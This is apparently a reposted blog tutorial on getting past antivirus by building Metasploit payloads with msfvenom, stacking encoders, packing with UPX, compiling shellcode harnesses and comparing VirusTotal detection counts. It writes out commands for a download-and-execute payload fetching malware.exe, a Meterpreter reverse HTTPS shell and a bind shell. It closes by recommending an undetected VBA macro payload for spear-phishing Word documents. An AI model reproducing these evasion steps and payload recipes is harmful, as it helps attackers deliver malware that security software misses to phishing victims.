Using Shellcode execution as a possible antivirus bypassal technique.-白红宇

Using Shellcode execution as a possible antivirus bypassal technique.

阅读量：5250 次

发布时间：2019-06-14

本文共 8056 字，大约阅读时间需要 26 分钟。

Ok, first off, we need to create our malicious "shellcode payload"... I have a few examples below of some possible payloads we could be using.

1. Download and execute.

msfvenom -p windows/download_exec URL=http://www.example.com/malware.exe -e x86/shikata_ga_nai -i 5 -e x86/countdown -i 3 -e x86/call4_dword_xor -i 5 -e x86/jmp_call_additive -i 5 -f c

2. Reverse Meterpreter HTTPS shell

msfvenom -p windows/meterpreter/reverse_https LHOST=127.0.0.1 LPORT=443 -e x86/shikata_ga_nai -i 5 -e x86/countdown -i 3 -e x86/call4_dword_xor -i 5 -e x86/jmp_call_additive -i 5 -f c

3. Standard Bind Shell

msfvenom -p windows/shell_bind_tcp LPORT=31337 -e x86/shikata_ga_nai -i 5 -e x86/countdown -i 3 -e x86/call4_dword_xor -i 5 -e x86/jmp_call_additive -i 5 -f c

These are the three payloads I will be testing. The encoding I chose at random and just went with the encoding that "felt right". I will not be running them, just uploading them to VirusTotal to show you them compared to their .exe outputs. Bin size (before and after UPX) and AV detections will be taken as the final "idea of how awesome they are".

Step One: Download and Execute Payload.

Here is the commands we will be using to make our "native metasploit exe" version (direct MSFVENOM output) of the dl/exec payload.

msfvenom -p windows/download_exec URL=http://www.example.com/malware.exe -e x86/shikata_ga_nai -i 5 -e x86/countdown -i 3 -e x86/call4_dword_xor -i 5 -e x86/jmp_call_additive -i 5 -f exe > /tmp/dlexec.exe

So. We got our binary, and we upload to VirusTotal Scanning service to see how many detections we get...

Filename: dlexec.exe

Filesize: 72.1 KB

MD5 Hash: aeace18d84af11640a219b2b557ee8ee

Packing: No UPX used.

Detections: 32/42

(Detections are at time of scan)

Link: https://www.virustotal.com/file/9e5c565e48de976e14d316db667cf22f3b50671f47e38ff0864775e5888ee51b/analysis/1332350345/

Next up we UPX it with this command: upx -9 dlexec.exe

Filesize: 47.0KB

MD5 Hash: ac4375e1a7fe474548dd798bd60f8f04

Detections: 27/43

(Detections are at time of scan)

Link: https://www.virustotal.com/file/fef15aee195c8bdcbbee3cbbc91fab36791a172096f06152e24a9b1862d1405c/analysis/1332350651/

Now, we re-do the whole thing with the ShellCodeExec Method which should be a LOT less detected.

First, we create our shellcode:

msfvenom -p windows/download_exec URL=http://www.example.com/malware.exe -e x86/shikata_ga_nai -i 5 -e x86/countdown -i 3 -e x86/call4_dword_xor -i 5 -e x86/jmp_call_additive -i 5 -f c

Now, we pop it into our shellcode-harness...

And compile: i586-mingw32msvc-gcc meta.c -o dlcrypt.exe

Filename: dlcrypt.exe

Filesize: 20.1KB

MD5 Hash: f873ab0d718dbd61b7987c7467ae589c

Packing: No UPX used.

Detections: 14 / 43

(Detections are at time of scan)

Link: https://www.virustotal.com/file/38f34eae9f19c401f61406d80d47e9280fa689b3abcfdfb17571849f69d0de17/analysis/1332351185/

As you can see, it is a far smaller file with a lot less detections. Lets UPX it and see what happens next...

Filename: dlcrypt.exe

Filesize: 14.1 KB

MD5 Hash: 03d634dde3d1e573d99776009e8567f5

Packing: UPX used.

Detections: 18 / 43

(Detections are at time of scan)

Link: https://www.virustotal.com/file/fc6e15bc19fc1f1bfaec9aeac8f2ede308e3d78b3e4efe90ab3b0804d8bafd4d/analysis/1332351313/

It would appear UPX is counterproductive to bypassing AV (packers normally are...) so tomorrow I will try the second payload, my FAVOURITE one, the Meterpreter Reverse HTTPS payload.

Ok. Reverse HTTPS payload time!

Here is the commands we will be using to make our "native metasploit exe" version (direct MSFVENOM output) of the reverse https meterpreter payload.

msfvenom -p windows/meterpreter/reverse_https LHOST=127.0.0.1 LPORT=443 -e x86/shikata_ga_nai -i 5 -e x86/countdown -i 3 -e x86/call4_dword_xor -i 5 -e x86/jmp_call_additive -i 5 -f exe > /tmp/payload.exe

So. We got our binary, and we upload to VirusTotal Scanning service to see how many detections we get...

Filename: payload.exe

Filesize: 72.1 KB

MD5 Hash: dd347fcf69bdbc33f1ea2b318cf4831c

Packing: No UPX used.

Detections: 30 / 43

(Detections are at time of scan)

Link: https://www.virustotal.com/file/6a7cbf711f24a7ff1ae14a83ff193b4c17b3043516d5bd7366a7db736c793b8f/analysis/1332423872/

Next up, we UPX

Filename: payload.exe

Filesize: 47.0 KB

MD5 Hash: 5cdf49f9df5701f76b9ee9f8917e6d05

Packing: UPX used.

Detections: 26 / 42

(Detections are at time of scan)

Link: https://www.virustotal.com/file/fc11cfbcbd5d13a5acce3e4fb82f93133bbc62e8df6d00ff8478faa3bdf1e113/analysis/1332424184/

AS you can see, UPX had a positive effect this time. Now I then noticed something bloody amazing in the MSFVENOM manual.

exe-small output.

msfvenom -p windows/meterpreter/reverse_https LHOST=127.0.0.1 LPORT=443 -f exe-small > /tmp/payload.exe

No encoding used this time BTW.

Filename: payload.exe

Filesize: 4.5 KB

MD5 Hash: 0bd184dd04ff1015ffbce7e792c2c598

Packing: None

Detections: 13 / 43

Link: https://www.virustotal.com/file/bd9d1d6228e0aad08f3bb885bbf1d8f8e4c78b4530f8dd5b82da96e52b6a5c3f/analysis/1332424669/

SO, lets add some encoding and see what happens...

msfvenom -p windows/meterpreter/reverse_https LHOST=127.0.0.1 LPORT=443 -e x86/shikata_ga_nai -i 5 -e x86/countdown -i 3 -e x86/call4_dword_xor -i 5 -e x86/jmp_call_additive -i 5 -f exe-small > 1.exe

https://www.virustotal.com/file/e946566e5c0162c4090f126cb12077926433f66c62c9354fa730242ade663b3c/analysis/1332427945/

More detected? WTF? Fine. lets move on...

Now, I started looking into alternative outputs... And came up with this.

msfvenom -p windows/meterpreter/reverse_https LHOST=127.0.0.1 LPORT=443 -f vba-exe > /tmp/vba.exe

Filename: vba.exe

Filesize: 290.2 KB

MD5 Hash: aedde86916de88b856b22c6e384901bb

Packing: None

Detections: 0 / 42

Link: https://www.virustotal.com/file/66e496f92029e31ab2c9df7ba886502efb3fa471d5451828df7c99d56f71dc56/analysis/1332427482/

This is a MS Office Macro payload. Simply open it in a text editor and follow the instructions...

Final Notes: The MS Office Macro payload is likely the most promising of the lot, as it can be directly embedded into a MS-Word document for spear phishing attacks, and seems to auto bypass things like AV.

Now for ONE LAST TRY: Objdump Pwnage.

root@shinigami:/tmp# msfvenom -p windows/meterpreter/reverse_https LHOST=127.0.0.1 LPORT=443 -f exe-small > /tmp/micro.exe

root@shinigami:/tmp# wget http://www.projectshellcode.com/downloads/xxd-shellcode.sh

root@shinigami:/tmp# chmod +x xxd-shellcode.sh

root@shinigami:/tmp# ./xxd-shellcode.sh micro.exe > sc.txt

### Here is where you pop the contents of sc.txt into the shellcode test harness as before ###

root@shinigami:/tmp# i586-mingw32msvc-gcc sc.c -o helloshell.exe

SO now we scan our new binary... See how "bypassing" it is. We can take this further BTW...

MD5: 7642f0914ebbe62ddc8d64ffe7d52783

File size: 24.1 KB ( 24650 bytes )

File name: helloshell.exe

File type: Win32 EXE